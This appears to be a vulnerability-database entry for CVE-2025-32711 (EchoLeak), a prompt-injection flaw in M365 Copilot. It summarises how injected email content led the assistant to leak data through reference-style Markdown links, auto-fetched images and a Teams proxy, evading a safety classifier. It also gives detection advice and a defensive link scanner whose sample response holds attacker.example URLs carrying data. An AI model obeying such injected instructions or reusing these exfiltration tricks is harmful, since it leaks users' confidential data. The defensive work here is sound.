CVE-2025-32711
published 2025-06-11

CVE-2025-32711: AI command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network.

Priority: P3 54 high
CVSS 3.1 base score: 7.5 (AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N)
EPSS: 5.78% (92.2th percentile)

Affected

2 ranges

Vendor      Product                  Version range   Fixed in
microsoft   microsoft_365_copilot    (not listed)    (not listed)
msrc        microsoft_365_copilot    (not listed)    (not listed)

Detection & IOCs (extracted from sources)

Techniques (category: other)
  • reference-style Markdown used to circumvent link redaction
  • Microsoft Teams proxy abused via content security policy allowance for data exfiltration
  • auto-fetched images exploited as exfiltration channel

Detection
  • Inspect Copilot prompt and response traffic for reference-style Markdown link patterns that may be used to bypass link redaction controls and smuggle exfiltration URLs.
  • Alert on Copilot responses that include outbound requests to Microsoft Teams proxy endpoints not initiated by direct user action, as this was the exfiltration channel leveraged in EchoLeak.
  • Use NLP-based email intent analysis to flag emails whose content, when parsed as instructions, would direct an AI assistant to exfiltrate data—even if the email appears benign to human readers.
  • Monitor for XPIA (Cross Prompt Injection Attempt) classifier evasion patterns in emails processed by M365 Copilot, as EchoLeak specifically chained bypasses of Microsoft's XPIA classifier.

Mitigation
  • Microsoft patched EchoLeak server-side in May 2025; no customer action is required for the patch itself, but configuration hardening is still recommended.
  • Disabling external email context in Copilot settings is a recommended mitigation to reduce the RAG attack surface for this class of prompt injection.
  • Restricting markdown rendering in AI outputs reduces the prompt injection risk surface, particularly for reference-style Markdown link exfiltration.
  • Existing defenses (e.g., retrieval filtering) are insufficient to prevent retrieval of optimized malicious text; adaptive attack variants can bypass them.
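The first detection bullet above (reference-style Markdown links used to smuggle exfiltration URLs) and the technique note on auto-fetched images are the kind of thing a response-side content filter can check before Markdown is rendered. The scanner below is an added example written for this entry; it is not code from the source write-ups, from Microsoft, or from this database. It parses reference-style link definitions (`[label]: url`), their `[text][label]` / `![alt][label]` usages and inline images out of an assistant response, and reports every destination whose host is not on an allow-list. The sample response text, the hosts `attacker.example` and `contoso.sharepoint.com`, and the allow-list are all constructed for the demonstration; the page does not name the Teams proxy endpoint, so nothing here hard-codes one.

```python
import re
from urllib.parse import urlsplit

# Reference-style link definition line:  [label]: <url> "optional title"
REF_DEF = re.compile(r'^[ \t]{0,3}\[([^\]]+)\]:[ \t]*<?([^\s>]+)>?', re.MULTILINE)
# Reference-style usage: [text][label] for links, ![alt][label] for images
REF_USE = re.compile(r'(!?)\[([^\]]+)\]\[([^\]]*)\]')
# Inline image: ![alt](url) -- auto-fetched by the renderer without a click
INLINE_IMG = re.compile(r'!\[[^\]]*\]\(([^)\s]+)')


def _host_of(url):
    """Lower-cased hostname of a URL, or '' for relative/malformed links."""
    try:
        return (urlsplit(url).hostname or '').lower()
    except ValueError:
        return ''


def scan_copilot_output(text, allowed_hosts=frozenset()):
    """Return findings for Markdown link/image destinations outside allowed_hosts.

    Each finding records the link label, destination URL and host, how the
    label is used (link, image, inline_image or unreferenced) and whether the
    URL carries a query string, which is where smuggled data usually rides.
    """
    findings = []

    # Map every reference label to its destination URL.
    definitions = {m.group(1).strip().lower(): m.group(2)
                   for m in REF_DEF.finditer(text)}

    # Work out whether each label is rendered as a link or as an image.
    usage = {}
    for m in REF_USE.finditer(text):
        is_image, text_part, label_part = m.group(1), m.group(2), m.group(3)
        label = (label_part or text_part).strip().lower()  # [text][] uses text as label
        usage[label] = 'image' if is_image else 'link'

    for label, url in definitions.items():
        host = _host_of(url)
        if not host or host in allowed_hosts:
            continue
        findings.append({
            'label': label,
            'url': url,
            'host': host,
            'usage': usage.get(label, 'unreferenced'),
            'carries_query': bool(urlsplit(url).query),
        })

    for m in INLINE_IMG.finditer(text):
        url = m.group(1)
        host = _host_of(url)
        if not host or host in allowed_hosts:
            continue
        findings.append({
            'label': None,
            'url': url,
            'host': host,
            'usage': 'inline_image',
            'carries_query': bool(urlsplit(url).query),
        })

    return findings


# Constructed sample of an assistant response; hosts are placeholders.
SAMPLE_RESPONSE = """Here is the summary you asked for.

Quarterly numbers: see the [finance report][1] and the [team wiki][docs].

![status][2]

[1]: https://attacker.example/collect?d=Q3-revenue-12.4M
[docs]: https://contoso.sharepoint.com/sites/finance
[2]: https://attacker.example/pixel.png?u=alice
"""

ALLOWED_HOSTS = frozenset({'contoso.sharepoint.com'})  # constructed allow-list


if __name__ == '__main__':
    for f in scan_copilot_output(SAMPLE_RESPONSE, ALLOWED_HOSTS):
        print(f"[{f['usage']}] label={f['label']} host={f['host']} "
              f"query={'yes' if f['carries_query'] else 'no'} url={f['url']}")
```

Running the block on the constructed sample reports the two `attacker.example` destinations (one rendered as a link, one as an image that a renderer would fetch without user interaction) and leaves the allow-listed SharePoint link alone. The allow-list is the policy decision: in a real deployment it would hold the tenant's own domains and any proxy endpoints the organisation has deliberately sanctioned, so that anything else, including a proxy reached without direct user action, surfaces for review.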

CVSS provenance

Source        Version   Score   Severity   Vector
nvd           v3.1      7.5     HIGH       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vendor_msrc   -         9.3     CRITICAL   (vector not listed)